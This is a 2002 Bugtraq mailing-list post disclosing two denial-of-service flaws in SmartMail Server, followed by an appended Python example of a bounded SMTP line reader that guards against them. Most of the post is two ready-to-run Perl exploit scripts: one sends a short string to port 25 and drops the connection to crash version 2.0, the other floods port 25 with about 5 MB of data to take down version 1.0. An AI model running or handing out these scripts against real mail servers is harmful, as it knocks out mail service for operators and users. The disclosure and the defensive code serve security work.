Bugtraq mailing list archives

SmartMail server DOS


From: securma massine <securma () caramail com>
Date: Thu, 31 Oct 2002 14:34:28 GMT+1

hi

SmartMail Server (http://www.virtualzone.de/smartmail/) is
a full-featured e-mail server. It can be
run on any 32-bit compatible Microsoft Windows machine and
complies with the SMTP, POP3 and HTTP (web interface)
standards.
SmartMail offers two versions of SmartMail Server; I found
that both versions are vulnerable to a DoS attack.
 1- SmartMail Server 2.0 Interim Build 83: closing the
connection while sending data causes an
"Access violatio at address 0046CBCC i
module 'smartsvr.exe' write of address 76756f4e ". This is
exactly the same vulnerability that I discovered
in popwerft, and the exploit has the same effect on
both programs.
 exploit:


#!/usr/bin/perl -w
# greetz: marocit and #crack.fr (christal)
# securma () caramail com
use Socket;
if (not $ARGV[0]) {
        print qq~
                Usage: sm.pl <host>
        ~;
        exit;
}

$ip=$ARGV[0];
print "SmartMail server 2.0 DoS\n\n";
print "Sending Exploit Code to host: " . $ip . "\n\n";
sendexplt("MASSINE");
sub sendexplt {
        my ($pstr)=@_;
        $target= inet_aton($ip) || die("inet_aton problems");
        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                die("Socket problems\n");
        if(connect(S,pack "SnA4x8",2,25,$target)){
                select(S);
                $|=1;
                print $pstr;
                sleep 3;
                close(S);
        } else { die("Can't connect...\n"); }
}



2- SmartMail Server 1.0 BETA 10: sending it 5 MB of data on
port 25 or 110 causes the shutdown of all the services
(pop/smtp/webinterface)
exploit:
#!/usr/bin/perl -w
# tool smartdos.pl
# securma () caramail com
# Greetz: marocit and #crack.fr (especially christal.)
#
use IO::Socket;
if ($#ARGV<0)
{
 print "\n write the target IP!\n\n";
 exit;
}
$buffer = "A"x 5099999 ;
$connect = IO::Socket::INET ->new (Proto=>"tcp",
PeerAddr=> "$ARGV[0]",
PeerPort=>"25");
unless ($connect) { die "cant connect $ARGV[0]" }
print $connect "$buffer";
print "\nsending exploit......\n\n";



securma () caramail com
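
The server side of the two inputs described in this post, as an added example that is not part of the original message or of SmartMail's code: a bounded SMTP command-line reader in Python that survives a peer closing mid-line and an unterminated multi-megabyte stream. The class and function names and the 512-octet limit (the RFC 5321 command-line maximum) are assumptions of this example.

```python
# Added defensive example; names and the 512-octet limit are assumptions.
MAX_LINE = 512  # RFC 5321 maximum command line, CRLF included


class BoundedLineReader:
    """Accumulates one SMTP command line, never buffering more than max_line bytes."""

    def __init__(self, max_line=MAX_LINE):
        self.max_line = max_line
        self.buf = bytearray()
        self.discarding = False  # True while skipping the rest of an oversized line

    def feed(self, chunk):
        """Consume socket bytes; return ("line", data) and ("too_long", None) events."""
        events, pos = [], 0
        while pos < len(chunk):
            nl = chunk.find(b"\n", pos)
            end = len(chunk) if nl < 0 else nl + 1
            piece, pos = chunk[pos:end], end
            if not self.discarding:
                if len(self.buf) + len(piece) > self.max_line:
                    self.buf.clear()          # drop the partial line, keep memory flat
                    self.discarding = True
                    events.append(("too_long", None))  # a server would answer 500 here
                else:
                    self.buf += piece
            if nl >= 0:                       # end of line reached
                if not self.discarding:
                    events.append(("line", bytes(self.buf).rstrip(b"\r\n")))
                self.buf.clear()
                self.discarding = False
        return events

    def close(self):
        """Peer closed the connection: report an unfinished line instead of parsing it."""
        pending = len(self.buf)
        self.buf.clear()
        return ("eof_mid_line", pending) if pending else None


def handle_session(chunks):
    """Run constructed network chunks through the reader and collect every event."""
    reader, events = BoundedLineReader(), []
    for chunk in chunks:
        events.extend(reader.feed(chunk))
    final = reader.close()
    return events + ([final] if final else [])
```
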

